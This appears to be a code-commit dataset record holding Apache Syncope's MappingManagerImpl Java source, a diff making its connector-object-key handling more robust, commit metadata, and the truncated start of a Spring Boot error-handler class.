Optional.of( new MembershipTO.Builder().group(group.getKey(), group.getName()).build()); groupableTO.getMemberships().add(membership.get()); } membership.get().getVirAttrs().add(attrTO); } break; default: } } } @Override public void setIntValues(final Item orgUnitItem, final Attribute attr, final RealmTO realmTO) { List<Object> values = null; if (attr != null) { values = attr.getValue(); for (ItemTransformer transformer : MappingUtils.getItemTransformers(orgUnitItem)) { values = transformer.beforePull(orgUnitItem, realmTO, values); } } if (values != null && !values.isEmpty() && values.get(0) != null) { switch (orgUnitItem.getIntAttrName()) { case "name": realmTO.setName(values.get(0).toString()); break; case "fullpath": String parentFullPath = StringUtils.substringBeforeLast(values.get(0).toString(), "/"); Realm parent = realmDAO.findByFullPath(parentFullPath); if (parent == null) { LOG.warn("Could not find Realm with path {}, ignoring", parentFullPath); } else { realmTO.setParent(parent.getFullPath()); } break; default: } } } }
core/provisioning-java/src/main/java/org/apache/syncope/core/provisioning/java/MappingManagerImpl.java
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.apache.syncope.core.provisioning.java; import java.util.ArrayList; import java.util.Collections; import java.util.HashSet; import java.util.List; import java.util.Optional; import java.util.Set; import org.apache.commons.lang3.StringUtils; import org.apache.commons.lang3.reflect.FieldUtils; import org.apache.commons.lang3.tuple.Pair; import org.apache.syncope.common.lib.to.AnyObjectTO; import org.apache.syncope.common.lib.to.AnyTO; import org.apache.syncope.common.lib.to.AttrTO; import org.apache.syncope.common.lib.to.GroupTO; import org.apache.syncope.common.lib.to.GroupableRelatableTO; import org.apache.syncope.common.lib.to.MembershipTO; import org.apache.syncope.common.lib.to.RealmTO; import org.apache.syncope.common.lib.to.UserTO; import org.apache.syncope.common.lib.types.AttrSchemaType; import org.apache.syncope.core.persistence.api.attrvalue.validation.ParsingValidationException; import org.apache.syncope.core.persistence.api.dao.AnyObjectDAO; import org.apache.syncope.core.persistence.api.dao.AnyTypeDAO; import org.apache.syncope.core.persistence.api.dao.DerSchemaDAO; import org.apache.syncope.core.persistence.api.dao.GroupDAO; import org.apache.syncope.core.persistence.api.dao.PlainSchemaDAO; import org.apache.syncope.core.persistence.api.dao.RealmDAO; import org.apache.syncope.core.persistence.api.dao.VirSchemaDAO; import org.apache.syncope.core.persistence.api.entity.Any; import org.apache.syncope.core.persistence.api.entity.AnyUtils; import org.apache.syncope.core.persistence.api.entity.AnyUtilsFactory; import org.apache.syncope.core.persistence.api.entity.DerSchema; import org.apache.syncope.core.persistence.api.entity.EntityFactory; import org.apache.syncope.core.persistence.api.entity.GroupableRelatable; import org.apache.syncope.core.persistence.api.entity.Membership; import org.apache.syncope.core.persistence.api.entity.PlainAttr; import org.apache.syncope.core.persistence.api.entity.PlainAttrValue; import org.apache.syncope.core.persistence.api.entity.PlainSchema; import org.apache.syncope.core.persistence.api.entity.Realm; import org.apache.syncope.core.persistence.api.entity.Schema; import org.apache.syncope.core.persistence.api.entity.VirSchema; import org.apache.syncope.core.persistence.api.entity.anyobject.AnyObject; import org.apache.syncope.core.persistence.api.entity.group.Group; import org.apache.syncope.core.persistence.api.entity.resource.Item; import org.apache.syncope.core.persistence.api.entity.resource.Mapping; import org.apache.syncope.core.persistence.api.entity.resource.MappingItem; import org.apache.syncope.core.persistence.api.entity.resource.OrgUnit; import org.apache.syncope.core.persistence.api.entity.resource.OrgUnitItem; import org.apache.syncope.core.persistence.api.entity.resource.Provision; import org.apache.syncope.core.persistence.api.entity.user.UPlainAttrValue; import org.apache.syncope.core.persistence.api.entity.user.User; import org.apache.syncope.core.provisioning.api.DerAttrHandler; import org.apache.syncope.core.provisioning.api.IntAttrName; import org.apache.syncope.core.provisioning.api.MappingManager; import org.apache.syncope.core.provisioning.api.VirAttrHandler; import org.apache.syncope.core.provisioning.api.cache.VirAttrCache; import org.apache.syncope.core.provisioning.api.utils.policy.InvalidPasswordRuleConf; import org.apache.syncope.core.provisioning.java.utils.ConnObjectUtils; import org.apache.syncope.core.provisioning.java.utils.MappingUtils; import org.apache.syncope.core.spring.security.Encryptor; import org.apache.syncope.core.spring.security.PasswordGenerator; import org.identityconnectors.framework.common.FrameworkUtil; import org.identityconnectors.framework.common.objects.Attribute; import org.identityconnectors.framework.common.objects.AttributeBuilder; import org.identityconnectors.framework.common.objects.AttributeUtil; import org.identityconnectors.framework.common.objects.OperationalAttributes; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.stereotype.Component; import org.springframework.transaction.annotation.Transactional; import org.apache.syncope.core.provisioning.api.data.ItemTransformer; import org.identityconnectors.framework.common.objects.Name; @Component public class MappingManagerImpl implements MappingManager { private static final Logger LOG = LoggerFactory.getLogger(MappingManager.class); private static final Encryptor ENCRYPTOR = Encryptor.getInstance(); @Autowired private AnyTypeDAO anyTypeDAO; @Autowired private PlainSchemaDAO plainSchemaDAO; @Autowired private DerSchemaDAO derSchemaDAO; @Autowired private VirSchemaDAO virSchemaDAO; @Autowired private AnyObjectDAO anyObjectDAO; @Autowired private GroupDAO groupDAO; @Autowired private RealmDAO realmDAO; @Autowired private DerAttrHandler derAttrHandler; @Autowired private VirAttrHandler virAttrHandler; @Autowired private VirAttrCache virAttrCache; @Autowired private PasswordGenerator passwordGenerator; @Autowired private EntityFactory entityFactory; @Autowired private AnyUtilsFactory anyUtilsFactory; @Autowired private IntAttrNameParser intAttrNameParser; @Transactional(readOnly = true) @Override public Pair<String, Set<Attribute>> prepareAttrs( final Any<?> any, final String password, final boolean changePwd, final Boolean enable, final Provision provision) { LOG.debug("Preparing resource attributes for {} with provision {} for attributes {}", any, provision, any.getPlainAttrs()); Set<Attribute> attributes = new HashSet<>(); String connObjectKey = null; for (Item mapItem : MappingUtils.getPropagationItems(provision.getMapping().getItems())) { LOG.debug("Processing expression '{}'", mapItem.getIntAttrName()); try { Pair<String, Attribute> preparedAttr = prepareAttr(provision, mapItem, any, password); if (preparedAttr != null) { if (preparedAttr.getLeft() != null) { connObjectKey = preparedAttr.getLeft(); } if (preparedAttr.getRight() != null) { Attribute alreadyAdded = AttributeUtil.find(preparedAttr.getRight().getName(), attributes); if (alreadyAdded == null) { attributes.add(preparedAttr.getRight()); } else { attributes.remove(alreadyAdded); Set<Object> values = new HashSet<>(); if (alreadyAdded.getValue() != null && !alreadyAdded.getValue().isEmpty()) { values.addAll(alreadyAdded.getValue()); } if (preparedAttr.getRight().getValue() != null) { values.addAll(preparedAttr.getRight().getValue()); } attributes.add(AttributeBuilder.build(preparedAttr.getRight().getName(), values)); } } } } catch (Exception e) { LOG.error("Expression '{}' processing failed", mapItem.getIntAttrName(), e); } } Attribute connObjectKeyExtAttr = AttributeUtil.find(MappingUtils.getConnObjectKeyItem(provision).get().getExtAttrName(), attributes); if (connObjectKeyExtAttr != null) { attributes.remove(connObjectKeyExtAttr); attributes.add(AttributeBuilder.build( MappingUtils.getConnObjectKeyItem(provision).get().getExtAttrName(), connObjectKey)); } Name name = MappingUtils.evaluateNAME(any, provision, connObjectKey); attributes.add(name); if (connObjectKey != null && !connObjectKey.equals(name.getNameValue()) && connObjectKeyExtAttr == null) { attributes.add(AttributeBuilder.build( MappingUtils.getConnObjectKeyItem(provision).get().getExtAttrName(), connObjectKey)); } if (enable != null) { attributes.add(AttributeBuilder.buildEnabled(enable)); } if (!changePwd) { Attribute pwdAttr = AttributeUtil.find(OperationalAttributes.PASSWORD_NAME, attributes); if (pwdAttr != null) { attributes.remove(pwdAttr); } } return Pair.of(connObjectKey, attributes); } private String getIntValue(final Realm realm, final Item orgUnitItem) { String value = null; switch (orgUnitItem.getIntAttrName()) { case "key": value = realm.getKey(); break; case "name": value = realm.getName(); break; case "fullpath": value = realm.getFullPath(); break; default: } return value; } @Override public Pair<String, Set<Attribute>> prepareAttrs(final Realm realm, final OrgUnit orgUnit) { LOG.debug("Preparing resource attributes for {} with orgUnit {}", realm, orgUnit); Set<Attribute> attributes = new HashSet<>(); String connObjectKey = null; for (Item orgUnitItem : MappingUtils.getPropagationItems(orgUnit.getItems())) { LOG.debug("Processing expression '{}'", orgUnitItem.getIntAttrName()); String value = getIntValue(realm, orgUnitItem); if (orgUnitItem.isConnObjectKey()) { connObjectKey = value; } Attribute alreadyAdded = AttributeUtil.find(orgUnitItem.getExtAttrName(), attributes); if (alreadyAdded == null) { if (value == null) { attributes.add(AttributeBuilder.build(orgUnitItem.getExtAttrName())); } else { attributes.add(AttributeBuilder.build(orgUnitItem.getExtAttrName(), value)); } } else if (value != null) { attributes.remove(alreadyAdded); Set<Object> values = new HashSet<>(); if (alreadyAdded.getValue() != null && !alreadyAdded.getValue().isEmpty()) { values.addAll(alreadyAdded.getValue()); } values.add(value); attributes.add(AttributeBuilder.build(orgUnitItem.getExtAttrName(), values)); } } Attribute connObjectKeyExtAttr = AttributeUtil.find(orgUnit.getConnObjectKeyItem().get().getExtAttrName(), attributes); if (connObjectKeyExtAttr != null) { attributes.remove(connObjectKeyExtAttr); attributes.add( AttributeBuilder.build(orgUnit.getConnObjectKeyItem().get().getExtAttrName(), connObjectKey)); } attributes.add(MappingUtils.evaluateNAME(realm, orgUnit, connObjectKey)); return Pair.of(connObjectKey, attributes); } /** * Prepare an attribute to be sent to a connector instance. * * @param provision external resource * @param mapItem mapping item for the given attribute * @param any given any object * @param password clear-text password * @return connObjectKey + prepared attribute */ private Pair<String, Attribute> prepareAttr( final Provision provision, final Item mapItem, final Any<?> any, final String password) { IntAttrName intAttrName = intAttrNameParser.parse(mapItem.getIntAttrName(), provision.getAnyType().getKind()); boolean readOnlyVirSchema = false; Schema schema = null; AttrSchemaType schemaType = AttrSchemaType.String; if (intAttrName.getSchemaType() != null) { switch (intAttrName.getSchemaType()) { case PLAIN: schema = plainSchemaDAO.find(intAttrName.getSchemaName()); if (schema != null) { schemaType = schema.getType(); } break; case VIRTUAL: schema = virSchemaDAO.find(intAttrName.getSchemaName()); readOnlyVirSchema = (schema != null && schema.isReadonly()); break; default: } } List<PlainAttrValue> values = getIntValues(provision, mapItem, intAttrName, any); LOG.debug("Define mapping for: " + "\n* ExtAttrName " + mapItem.getExtAttrName() + "\n* is connObjectKey " + mapItem.isConnObjectKey() + "\n* is password " + mapItem.isPassword() + "\n* mandatory condition " + mapItem.getMandatoryCondition() + "\n* Schema " + intAttrName.getSchemaName() + "\n* ClassType " + schemaType.getType().getName() + "\n* Values " + values); Pair<String, Attribute> result; if (readOnlyVirSchema) { result = null; } else { List<Object> objValues = new ArrayList<>(); for (PlainAttrValue value : values) { if (FrameworkUtil.isSupportedAttributeType(schemaType.getType())) { objValues.add(value.getValue()); } else { objValues.add(value.getValueAsString(schemaType)); } } if (mapItem.isConnObjectKey()) { result = Pair.of(objValues.isEmpty() ? null : objValues.iterator().next().toString(), null); } else if (mapItem.isPassword() && any instanceof User) { String passwordAttrValue = password; if (StringUtils.isBlank(passwordAttrValue)) { User user = (User) any; if (user.canDecodePassword()) { try { passwordAttrValue = ENCRYPTOR.decode(user.getPassword(), user.getCipherAlgorithm()); } catch (Exception e) { LOG.error("Could not decode password for {}", user, e); } } else if (provision.getResource().isRandomPwdIfNotProvided()) { try { passwordAttrValue = passwordGenerator.generate(provision.getResource()); } catch (InvalidPasswordRuleConf e) { LOG.error("Could not generate policy-compliant random password for {}", user, e); } } } if (passwordAttrValue == null) { result = null; } else { result = Pair.of(null, AttributeBuilder.buildPassword(passwordAttrValue.toCharArray())); } } else if (schema != null && schema.isMultivalue()) { result = Pair.of(null, AttributeBuilder.build(mapItem.getExtAttrName(), objValues)); } else { result = Pair.of(null, objValues.isEmpty() ? AttributeBuilder.build(mapItem.getExtAttrName()) : AttributeBuilder.build(mapItem.getExtAttrName(), objValues.iterator().next())); } } return result; } @Transactional(readOnly = true) @Override public List<PlainAttrValue> getIntValues( final Provision provision, final Item mapItem, final IntAttrName intAttrName, final Any<?> any) { LOG.debug("Get internal values for {} as '{}' on {}", any, mapItem.getIntAttrName(), provision.getResource()); Any<?> reference = null; Membership<?> membership = null; if (intAttrName.getEnclosingGroup() == null && intAttrName.getRelatedAnyObject() == null) { reference = any; } if (any instanceof GroupableRelatable) { GroupableRelatable<?, ?, ?, ?, ?> groupableRelatable = (GroupableRelatable<?, ?, ?, ?, ?>) any; if (intAttrName.getEnclosingGroup() != null) { Group group = groupDAO.findByName(intAttrName.getEnclosingGroup()); if (group == null || groupableRelatable.getMembership(group.getKey()) == null) { LOG.warn("No membership for {} in {}, ignoring", intAttrName.getEnclosingGroup(), groupableRelatable); } else { reference = group; } } else if (intAttrName.getRelatedAnyObject() != null) { AnyObject anyObject = anyObjectDAO.findByName(intAttrName.getRelatedAnyObject()); if (anyObject == null || groupableRelatable.getRelationships(anyObject.getKey()).isEmpty()) { LOG.warn("No relationship for {} in {}, ignoring", intAttrName.getRelatedAnyObject(), groupableRelatable); } else { reference = anyObject; } } else if (intAttrName.getMembershipOfGroup() != null) { Group group = groupDAO.findByName(intAttrName.getMembershipOfGroup()); membership = groupableRelatable.getMembership(group.getKey()).orElse(null); } } if (reference == null) { LOG.warn("Could not determine the reference instance for {}", mapItem.getIntAttrName()); return Collections.emptyList(); } List<PlainAttrValue> values = new ArrayList<>(); boolean transform = true; AnyUtils anyUtils = anyUtilsFactory.getInstance(reference); if (intAttrName.getField() != null) { PlainAttrValue attrValue = anyUtils.newPlainAttrValue(); switch (intAttrName.getField()) { case "key": attrValue.setStringValue(reference.getKey()); values.add(attrValue); break; case "password": // ignore break; case "username": if (reference instanceof User) { attrValue = entityFactory.newEntity(UPlainAttrValue.class); attrValue.setStringValue(((User) reference).getUsername()); values.add(attrValue); } break; case "name": if (reference instanceof Group) { attrValue = entityFactory.newEntity(UPlainAttrValue.class); attrValue.setStringValue(((Group) reference).getName()); values.add(attrValue); } else if (reference instanceof AnyObject) { attrValue = entityFactory.newEntity(UPlainAttrValue.class); attrValue.setStringValue(((AnyObject) reference).getName()); values.add(attrValue); } break; case "userOwner": case "groupOwner": Mapping uMapping = provision.getAnyType().equals(anyTypeDAO.findUser()) ? provision.getMapping() : null; Mapping gMapping = provision.getAnyType().equals(anyTypeDAO.findGroup()) ? provision.getMapping() : null; if (reference instanceof Group) { Group group = (Group) reference; String groupOwnerValue = null; if (group.getUserOwner() != null && uMapping != null) { groupOwnerValue = getGroupOwnerValue(provision, group.getUserOwner()); } if (group.getGroupOwner() != null && gMapping != null) { groupOwnerValue = getGroupOwnerValue(provision, group.getGroupOwner()); } if (StringUtils.isNotBlank(groupOwnerValue)) { attrValue = entityFactory.newEntity(UPlainAttrValue.class); attrValue.setStringValue(groupOwnerValue); values.add(attrValue); } } break; default: try { attrValue.setStringValue(FieldUtils.readField( reference, intAttrName.getField(), true).toString()); values.add(attrValue); } catch (IllegalAccessException e) { LOG.error("Could not read value of '{}' from {}", intAttrName.getField(), reference, e); } } } else if (intAttrName.getSchemaType() != null) { switch (intAttrName.getSchemaType()) { case PLAIN: PlainAttr<?> attr; if (membership == null) { attr = reference.getPlainAttr(intAttrName.getSchemaName()).orElse(null); } else { attr = ((GroupableRelatable<?, ?, ?, ?, ?>) reference).getPlainAttr( intAttrName.getSchemaName(), membership).orElse(null); } if (attr != null) { if (attr.getUniqueValue() != null) { values.add(anyUtils.clonePlainAttrValue(attr.getUniqueValue())); } else if (attr.getValues() != null) { attr.getValues().forEach(value -> values.add(anyUtils.clonePlainAttrValue(value))); } } break; case DERIVED: DerSchema derSchema = derSchemaDAO.find(intAttrName.getSchemaName()); if (derSchema != null) { String value = membership == null ? derAttrHandler.getValue(reference, derSchema) : derAttrHandler.getValue(reference, membership, derSchema); if (value != null) { PlainAttrValue attrValue = anyUtils.newPlainAttrValue(); attrValue.setStringValue(value); values.add(attrValue); } } break; case VIRTUAL: // virtual attributes don't get transformed transform = false; VirSchema virSchema = virSchemaDAO.find(intAttrName.getSchemaName()); if (virSchema != null) { LOG.debug("Expire entry cache {}-{}", reference, intAttrName.getSchemaName()); virAttrCache.expire( reference.getType().getKey(), reference.getKey(), intAttrName.getSchemaName()); List<String> virValues = membership == null ? virAttrHandler.getValues(reference, virSchema) : virAttrHandler.getValues(reference, membership, virSchema); virValues.stream(). map(value -> { PlainAttrValue attrValue = anyUtils.newPlainAttrValue(); attrValue.setStringValue(value); return attrValue; }). forEachOrdered(attrValue -> values.add(attrValue)); } break; default: } } LOG.debug("Internal values: {}", values); List<PlainAttrValue> transformed = values; if (transform) { for (ItemTransformer transformer : MappingUtils.getItemTransformers(mapItem)) { transformed = transformer.beforePropagation(mapItem, any, transformed); } LOG.debug("Transformed values: {}", values); } else { LOG.debug("No transformation occurred"); } return transformed; } private String getGroupOwnerValue(final Provision provision, final Any<?> any) { Pair<String, Attribute> preparedAttr = prepareAttr(provision, MappingUtils.getConnObjectKeyItem(provision).get(), any, null); String connObjectKey = preparedAttr.getKey(); return MappingUtils.evaluateNAME(any, provision, connObjectKey).getNameValue(); } @Transactional(readOnly = true) @Override public Optional<String> getConnObjectKeyValue(final Any<?> any, final Provision provision) { MappingItem mapItem = provision.getMapping().getConnObjectKeyItem().get(); List<PlainAttrValue> values = getIntValues( provision, mapItem, intAttrNameParser.parse(mapItem.getIntAttrName(), provision.getAnyType().getKind()), any); return Optional.ofNullable(values.isEmpty() ? null : values.get(0).getValueAsString()); } @Transactional(readOnly = true) @Override public String getConnObjectKeyValue(final Realm realm, final OrgUnit orgUnit) { OrgUnitItem orgUnitItem = orgUnit.getConnObjectKeyItem().get(); return getIntValue(realm, orgUnitItem); } @Transactional(readOnly = true) @Override public void setIntValues(final Item mapItem, final Attribute attr, final AnyTO anyTO, final AnyUtils anyUtils) { List<Object> values = null; if (attr != null) { values = attr.getValue(); for (ItemTransformer transformer : MappingUtils.getItemTransformers(mapItem)) { values = transformer.beforePull(mapItem, anyTO, values); } } values = values == null ? Collections.emptyList() : values; IntAttrName intAttrName = intAttrNameParser.parse(mapItem.getIntAttrName(), anyUtils.getAnyTypeKind()); if (intAttrName.getField() != null) { switch (intAttrName.getField()) { case "password": if (anyTO instanceof UserTO && !values.isEmpty()) { ((UserTO) anyTO).setPassword(ConnObjectUtils.getPassword(values.get(0))); } break; case "username": if (anyTO instanceof UserTO) { ((UserTO) anyTO).setUsername(values.isEmpty() || values.get(0) == null ? null : values.get(0).toString()); } break; case "name": if (anyTO instanceof GroupTO) { ((GroupTO) anyTO).setName(values.isEmpty() || values.get(0) == null ? null : values.get(0).toString()); } else if (anyTO instanceof AnyObjectTO) { ((AnyObjectTO) anyTO).setName(values.isEmpty() || values.get(0) == null ? null : values.get(0).toString()); } break; case "userOwner": case "groupOwner": if (anyTO instanceof GroupTO && attr != null) { // using a special attribute (with schema "", that will be ignored) for carrying the // GroupOwnerSchema value AttrTO attrTO = new AttrTO(); attrTO.setSchema(StringUtils.EMPTY); if (values.isEmpty() || values.get(0) == null) { attrTO.getValues().add(StringUtils.EMPTY); } else { attrTO.getValues().add(values.get(0).toString()); } ((GroupTO) anyTO).getPlainAttrs().add(attrTO); } break; default: } } else if (intAttrName.getSchemaType() != null) { GroupableRelatableTO groupableTO = null; Group group = null; if (anyTO instanceof GroupableRelatableTO && intAttrName.getMembershipOfGroup() != null) { groupableTO = (GroupableRelatableTO) anyTO; group = groupDAO.findByName(intAttrName.getMembershipOfGroup()); } switch (intAttrName.getSchemaType()) { case PLAIN: AttrTO attrTO = new AttrTO(); attrTO.setSchema(intAttrName.getSchemaName()); PlainSchema schema = plainSchemaDAO.find(intAttrName.getSchemaName()); for (Object value : values) { AttrSchemaType schemaType = schema == null ? AttrSchemaType.String : schema.getType(); if (value != null) { PlainAttrValue attrValue = anyUtils.newPlainAttrValue(); switch (schemaType) { case String: attrValue.setStringValue(value.toString()); break; case Binary: attrValue.setBinaryValue((byte[]) value); break; default: try { attrValue.parseValue(schema, value.toString()); } catch (ParsingValidationException e) { LOG.error("While parsing provided value {}", value, e); attrValue.setStringValue(value.toString()); schemaType = AttrSchemaType.String; } break; } attrTO.getValues().add(attrValue.getValueAsString(schemaType)); } } if (groupableTO == null || group == null) { anyTO.getPlainAttrs().add(attrTO); } else { Optional<MembershipTO> membership = groupableTO.getMembership(group.getKey()); if (!membership.isPresent()) { membership = Optional.of( new MembershipTO.Builder().group(group.getKey(), group.getName()).build()); groupableTO.getMemberships().add(membership.get()); } membership.get().getPlainAttrs().add(attrTO); } break; case DERIVED: attrTO = new AttrTO(); attrTO.setSchema(intAttrName.getSchemaName()); if (groupableTO == null || group == null) { anyTO.getDerAttrs().add(attrTO); } else { Optional<MembershipTO> membership = groupableTO.getMembership(group.getKey()); if (!membership.isPresent()) { membership = Optional.of( new MembershipTO.Builder().group(group.getKey(), group.getName()).build()); groupableTO.getMemberships().add(membership.get()); } membership.get().getDerAttrs().add(attrTO); } break; case VIRTUAL: attrTO = new AttrTO(); attrTO.setSchema(intAttrName.getSchemaName()); // virtual attributes don't get transformed, iterate over original attr.getValue() if (attr != null && attr.getValue() != null && !attr.getValue().isEmpty()) { attr.getValue().stream(). filter(value -> value != null). forEachOrdered(value -> attrTO.getValues().add(value.toString())); } if (groupableTO == null || group == null) { anyTO.getVirAttrs().add(attrTO); } else { Optional<MembershipTO> membership = groupableTO.getMembership(group.getKey()); if (!membership.isPresent()) { membership = Optional.of( new MembershipTO.Builder().group(group.getKey(), group.getName()).build()); groupableTO.getMemberships().add(membership.get()); } membership.get().getVirAttrs().add(attrTO); } break; default: } } } @Override public void setIntValues(final Item orgUnitItem, final Attribute attr, final RealmTO realmTO) { List<Object> values = null; if (attr != null) { values = attr.getValue(); for (ItemTransformer transformer : MappingUtils.getItemTransformers(orgUnitItem)) { values = transformer.beforePull(orgUnitItem, realmTO, values); } } if (values != null && !values.isEmpty() && values.get(0) != null) { switch (orgUnitItem.getIntAttrName()) { case "name": realmTO.setName(values.get(0).toString()); break; case "fullpath": String parentFullPath = StringUtils.substringBeforeLast(values.get(0).toString(), "/"); Realm parent = realmDAO.findByFullPath(parentFullPath); if (parent == null) { LOG.warn("Could not find Realm with path {}, ignoring", parentFullPath); } else { realmTO.setParent(parent.getFullPath()); } break; default: } } } }
More robust ConnObjectKey handling
core/provisioning-java/src/main/java/org/apache/syncope/core/provisioning/java/MappingManagerImpl.java
More robust ConnObjectKey handling
<ide><path>ore/provisioning-java/src/main/java/org/apache/syncope/core/provisioning/java/MappingManagerImpl.java <ide> } <ide> } <ide> <del> Attribute connObjectKeyExtAttr = <del> AttributeUtil.find(MappingUtils.getConnObjectKeyItem(provision).get().getExtAttrName(), attributes); <del> if (connObjectKeyExtAttr != null) { <del> attributes.remove(connObjectKeyExtAttr); <del> attributes.add(AttributeBuilder.build( <del> MappingUtils.getConnObjectKeyItem(provision).get().getExtAttrName(), connObjectKey)); <del> } <del> Name name = MappingUtils.evaluateNAME(any, provision, connObjectKey); <del> attributes.add(name); <del> if (connObjectKey != null && !connObjectKey.equals(name.getNameValue()) && connObjectKeyExtAttr == null) { <del> attributes.add(AttributeBuilder.build( <del> MappingUtils.getConnObjectKeyItem(provision).get().getExtAttrName(), connObjectKey)); <add> Optional<MappingItem> connObjectKeyItem = MappingUtils.getConnObjectKeyItem(provision); <add> if (connObjectKeyItem.isPresent()) { <add> Attribute connObjectKeyExtAttr = AttributeUtil.find(connObjectKeyItem.get().getExtAttrName(), attributes); <add> if (connObjectKeyExtAttr != null) { <add> attributes.remove(connObjectKeyExtAttr); <add> attributes.add(AttributeBuilder.build(connObjectKeyItem.get().getExtAttrName(), connObjectKey)); <add> } <add> Name name = MappingUtils.evaluateNAME(any, provision, connObjectKey); <add> attributes.add(name); <add> if (connObjectKey != null && !connObjectKey.equals(name.getNameValue()) && connObjectKeyExtAttr == null) { <add> attributes.add(AttributeBuilder.build(connObjectKeyItem.get().getExtAttrName(), connObjectKey)); <add> } <ide> } <ide> <ide> if (enable != null) {
Java
apache-2.0
617f97f788e70c61f7c942ddc9126ef2c09c73d7
0
aahlenst/spring-boot,mdeinum/spring-boot,Buzzardo/spring-boot,kdvolder/spring-boot,rweisleder/spring-boot,jxblum/spring-boot,wilkinsona/spring-boot,vpavic/spring-boot,tiarebalbi/spring-boot,chrylis/spring-boot,spring-projects/spring-boot,rweisleder/spring-boot,wilkinsona/spring-boot,kdvolder/spring-boot,NetoDevel/spring-boot,Buzzardo/spring-boot,shakuzen/spring-boot,aahlenst/spring-boot,NetoDevel/spring-boot,lburgazzoli/spring-boot,michael-simons/spring-boot,royclarkson/spring-boot,kdvolder/spring-boot,jxblum/spring-boot,vpavic/spring-boot,yangdd1205/spring-boot,ilayaperumalg/spring-boot,philwebb/spring-boot,vpavic/spring-boot,michael-simons/spring-boot,spring-projects/spring-boot,mbenson/spring-boot,philwebb/spring-boot,mdeinum/spring-boot,michael-simons/spring-boot,htynkn/spring-boot,aahlenst/spring-boot,mbenson/spring-boot,kdvolder/spring-boot,Buzzardo/spring-boot,Buzzardo/spring-boot,tiarebalbi/spring-boot,philwebb/spring-boot,tiarebalbi/spring-boot,Buzzardo/spring-boot,eddumelendez/spring-boot,dreis2211/spring-boot,eddumelendez/spring-boot,ilayaperumalg/spring-boot,joshiste/spring-boot,lburgazzoli/spring-boot,lburgazzoli/spring-boot,tiarebalbi/spring-boot,shakuzen/spring-boot,royclarkson/spring-boot,michael-simons/spring-boot,royclarkson/spring-boot,Buzzardo/spring-boot,ilayaperumalg/spring-boot,NetoDevel/spring-boot,NetoDevel/spring-boot,aahlenst/spring-boot,joshiste/spring-boot,htynkn/spring-boot,rweisleder/spring-boot,michael-simons/spring-boot,htynkn/spring-boot,eddumelendez/spring-boot,scottfrederick/spring-boot,aahlenst/spring-boot,rweisleder/spring-boot,eddumelendez/spring-boot,aahlenst/spring-boot,spring-projects/spring-boot,ilayaperumalg/spring-boot,vpavic/spring-boot,wilkinsona/spring-boot,rweisleder/spring-boot,lburgazzoli/spring-boot,wilkinsona/spring-boot,tiarebalbi/spring-boot,philwebb/spring-boot,royclarkson/spring-boot,mbenson/spring-boot,spring-projects/spring-boot,joshiste/spring-boot,scottfrederick/spring-boot,dreis2211/spring-boot,rweisleder/spring-boot,scottfrederick/spring-boot,mdeinum/spring-boot,eddumelendez/spring-boot,spring-projects/spring-boot,royclarkson/spring-boot,wilkinsona/spring-boot,chrylis/spring-boot,dreis2211/spring-boot,joshiste/spring-boot,tiarebalbi/spring-boot,vpavic/spring-boot,chrylis/spring-boot,yangdd1205/spring-boot,scottfrederick/spring-boot,htynkn/spring-boot,spring-projects/spring-boot,philwebb/spring-boot,eddumelendez/spring-boot,mbenson/spring-boot,wilkinsona/spring-boot,htynkn/spring-boot,jxblum/spring-boot,htynkn/spring-boot,ilayaperumalg/spring-boot,ilayaperumalg/spring-boot,joshiste/spring-boot,jxblum/spring-boot,joshiste/spring-boot,chrylis/spring-boot,scottfrederick/spring-boot,mdeinum/spring-boot,kdvolder/spring-boot,chrylis/spring-boot,dreis2211/spring-boot,lburgazzoli/spring-boot,kdvolder/spring-boot,dreis2211/spring-boot,philwebb/spring-boot,vpavic/spring-boot,mdeinum/spring-boot,mbenson/spring-boot,scottfrederick/spring-boot,shakuzen/spring-boot,shakuzen/spring-boot,chrylis/spring-boot,dreis2211/spring-boot,shakuzen/spring-boot,mbenson/spring-boot,jxblum/spring-boot,michael-simons/spring-boot,jxblum/spring-boot,shakuzen/spring-boot,NetoDevel/spring-boot,mdeinum/spring-boot,yangdd1205/spring-boot
/* * Copyright 2012-2019 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.springframework.boot.autoconfigure.web.reactive.error; import java.util.Collections; import java.util.Date; import java.util.HashSet; import java.util.List; import java.util.Map; import java.util.Set; import org.apache.commons.logging.Log; import reactor.core.publisher.Mono; import org.springframework.beans.factory.InitializingBean; import org.springframework.boot.autoconfigure.template.TemplateAvailabilityProviders; import org.springframework.boot.autoconfigure.web.ResourceProperties; import org.springframework.boot.web.reactive.error.ErrorAttributes; import org.springframework.boot.web.reactive.error.ErrorWebExceptionHandler; import org.springframework.context.ApplicationContext; import org.springframework.core.NestedExceptionUtils; import org.springframework.core.io.Resource; import org.springframework.http.HttpLogging; import org.springframework.http.HttpStatus; import org.springframework.http.codec.HttpMessageReader; import org.springframework.http.codec.HttpMessageWriter; import org.springframework.util.Assert; import org.springframework.util.CollectionUtils; import org.springframework.util.StringUtils; import org.springframework.web.reactive.function.BodyInserters; import org.springframework.web.reactive.function.server.RouterFunction; import org.springframework.web.reactive.function.server.ServerRequest; import org.springframework.web.reactive.function.server.ServerResponse; import org.springframework.web.reactive.result.view.ViewResolver; import org.springframework.web.server.ServerWebExchange; import org.springframework.web.util.HtmlUtils; /** * Abstract base class for {@link ErrorWebExceptionHandler} implementations. * * @author Brian Clozel * @since 2.0.0 * @see ErrorAttributes */ public abstract class AbstractErrorWebExceptionHandler implements ErrorWebExceptionHandler, InitializingBean { /** * Currently duplicated from Spring WebFlux HttpWebHandlerAdapter. */ private static final Set<String> DISCONNECTED_CLIENT_EXCEPTIONS; static { Set<String> exceptions = new 